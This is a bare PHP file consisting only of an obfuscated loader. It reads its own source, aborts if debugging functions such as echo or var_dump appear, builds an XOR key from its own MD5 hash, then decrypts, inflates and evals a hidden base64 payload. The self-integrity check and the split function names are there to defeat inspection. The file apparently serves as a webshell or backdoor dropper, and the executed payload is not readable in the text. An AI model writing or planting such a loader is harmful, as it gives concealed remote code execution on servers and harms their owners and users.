<?php
$bndauuloxlnd="6789236ed9fb1737ffd58ecf3ce0e1f8";
$zmrdwqmcg="55005d5a035001555308545102555656500205010e500754065654055754500d";
$zzxgmnrtexb="9rm0afNTO3VIFHBSJpZu58jsqTxrD29vElgHLYAagYDWONd0LhBZXkWl9yNzLyv6F6RqIsIV2tEwr5cwD17zUxG3GLzUKz23FKz2sUXEBs0vaZN01aYza1WXsyoU+ZnQv9o22fbITpUy0LtU3EAE/tBpqTJ88H5auREUsKZBp99WJxIpJspoqwq0HmRMjoudXdfcNQ==";
$jkxqzxyewo=file_get_contents(__FILE__);
$bctnktfq=str_replace($zzxgmnrtexb,"",$jkxqzxyewo);
if(strpos($bctnktfq,"ec"."ho")!==false||strpos($bctnktfq,"pr"."int")!==false||strpos($bctnktfq,"var_"."dump")!==false||strpos($bctnktfq,"file_put_"."contents")!==false||strpos($bctnktfq,"fw"."rite")!==false){die();}
$lzctxpri=str_replace(array($bndauuloxlnd,$zmrdwqmcg),array("SP_cf2e9380","KP_e3857dec"),$jkxqzxyewo);
$bkjuygam=md5($lzctxpri);
$bnbbwe=hex2bin($zmrdwqmcg);
$pmlzjwemoa="";
$vnmmwbrwr=strlen($bkjuygam);
for($abkbdmmqkkbn=0;$abkbdmmqkkbn<$vnmmwbrwr;$abkbdmmqkkbn++){
    $pmlzjwemoa.=chr(ord($bnbbwe[$abkbdmmqkkbn])^ord($bkjuygam[$abkbdmmqkkbn]));
}
$ljhbnskprdx=base64_decode($zzxgmnrtexb);
$iasoitmdvb=strlen($ljhbnskprdx);
$sowbrxsrcrmq="";
$nwxnhqzqax=strlen($pmlzjwemoa);
for($abkbdmmqkkbn=0;$abkbdmmqkkbn<$iasoitmdvb;$abkbdmmqkkbn++){
    $sowbrxsrcrmq.=$ljhbnskprdx[$abkbdmmqkkbn]^$pmlzjwemoa[$abkbdmmqkkbn%$nwxnhqzqax];
}
$aoxbhgzkdblk="gz"."in"."fl"."ate";
eval($aoxbhgzkdblk($sowbrxsrcrmq));
